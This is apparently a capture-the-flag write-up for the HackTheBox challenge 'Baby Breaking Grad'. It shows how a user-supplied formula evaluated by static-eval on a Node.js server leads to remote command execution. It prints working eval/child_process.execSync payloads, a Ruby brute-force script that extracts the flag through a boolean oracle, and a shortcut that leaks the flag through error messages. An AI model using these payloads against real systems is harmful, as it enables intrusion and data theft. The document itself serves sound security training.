Baby Breaking Grad Writeup
10 September 2022 #CTF #HTB #chall #easy #webFirst Look
We have this pretty cool page:
We can clik on the button to check if we passed:
We can verify what it is doing by intercepting the request with Burp:
It sends a POST request to /api/calculate
with a name and responds with a json object that tells us if we passed.
Code Analysis
Since we don't have a lot of information about this web app, we should check the source to better understand what it is doing:
// challenge/routes/index.js'/api/calculate', (req, res) => {
let student = req.body;
if ( === undefined) {
return res.send({
error: 'Specify student name'
let formula = student.formula || '[0.20 * assignment + 0.25 * exam + 0.25 * paper]';
if (StudentHelper.isDumb( || !StudentHelper.hasPassed(student, formula)) {
return res.send({
'pass': 'n' + randomize('?', 10, {chars: 'o0'}) + 'pe'
return res.send({
'pass': 'Passed'
// challenge/helpers/StudentHelper.js
hasPassed({ exam, paper, assignment }, formula) {
let ast = parse(formula).body[0].expression;
let weight = evaluate(ast, { exam, paper, assignment });
return parseFloat(weight) >= parseFloat(10.5);
There are no other endpoints.
Those 2 functions are the most interesting for us. Especially this hasPassed
function because it uses the static-eval module to evaluate the formula, which we controll.
Now that we have way to execute arbitrary javascript on the server, it would be nice to execute system commands.
After searching a bit I came across this issue that has a payload to execute system commands (expected behaviour, not a vulnerability):
"(function (x) { return `${eval(\"console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())\")}` })()"
Test Setup
It is definitely a bad idea to head straight into the exploit phase without running a few tests before.
We can just copy the hasPassed
function and install the necessary packages:
$ mkdir test
$ cd test
$ npm i static-eval esprima
up to date, audited 71 packages in 1s
7 packages are looking for funding
run `npm fund` for details
found 0 vulnerabilities
And our test.js
const parse = require('esprima').parse;
const evaluate = require('static-eval');
function hasPassed({ exam, paper, assignment }, formula) {
console.log('formula:\t', formula);
let ast = parse(formula).body[0].expression;
let weight = evaluate(ast, { exam, paper, assignment });
console.log('weight:\t\t', weight);
return parseFloat(weight) >= parseFloat(10.5);
let student = { "name":"asdf" };
let formula = student.formula || '[0.20 * assignment + 0.25 * exam + 0.25 * paper]';
console.log('return value:\t', hasPassed(student, process.argv[2]));
I added a few console.log
to help debug what is going on.
Now we can run our test:
$ node test.js "21 * 2"
formula: 21 * 2
weight: 42
return value: true
Looking good.
Part 0 - The Strategy
We can see that the function does not return the output of our command, only a boolean.
The flag filename is randomly generated:
# Generate random flag filename
FLAG=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 5 | head -n 1)
mv /app/flag /app/flag$FLAG
Let's use this payload as formula:
[...]execSync('cat flag*').toString()[0] == 'H') * 42[...]
We also create a random flag filename to mimic what is on the remote side:
$ echo 'HTB{flag}' > flagZt2Yq
$ node test.js
formula: (function (x) { return `${eval("(global.process.mainModule.constructor._load('child_process').execSync('cat flag*').toString()[0] == 'H') * 42")}` })()
weight: 42
return value: true
This payload checks if the flag starts with an 'H'. We have to multiply the boolean result by a number larger than 10.5 because true == 1
and false == 0
in js.
We now have a way to bruteforce the characters of the flag 1 by 1.
Part 1 - The 'Fancy' Script
This will be the 'fancy' script:
require 'http'
url = ''
# generate an array of all printable characters
chars = (32..126).map &:chr
used = ''
chars.each do |c|
r = HTTP.via('', 8080)
.post(url, :json => { 'name': 'asdf', 'formula': "(function (x) { return `${eval(\"global.process.mainModule.constructor._load('child_process').execSync('cat flag*').toString().includes(String.fromCharCode(#{c.ord})) * 42\")}` })()" })
if r.to_s.include? 'Passed'
used += c
print "\rcharacters contained in flag: #{used}"
flag = 'HTB{'
i = 4
until flag[-1] == '}' do
used.each_char do |c|
r =, :json => { 'name': 'asdf', 'formula': "(function (x) { return `${eval(\"(global.process.mainModule.constructor._load('child_process').execSync('cat flag*').toString()[#{i}] == String.fromCharCode(#{c.ord})) * 42\")}` })()" })
if r.to_s.include? 'Passed'
flag += c
print "\rflag: #{flag}"
i += 1
The first loop is testing if a character is present in the flag (at any position) with include
Instead of specifying the character directly, I use fromCharCode
with the ASCII value of the character (taken with c.ord
) in order to avoid complications with quotes (talking from experience).
This will generate a character list much smaller than the original one.
The second loop is the one actually bruteforcing the flag. We start at index 4 because we already know the flag starts with 'HTB{'.
Bonus Part - The Easy Way
While debuging the script in Burp, I noticed the web app displays error messages:
We can try to use the shell substitution syntax:
...execSync('$(cat flag*)').toString()...
This will try to execute a command that is the contents of the flag file:
Definitely way simpler (:
Key Takeaways
- Prioritize simplicity
- No output -> boolean based technique
- Error messages can be useful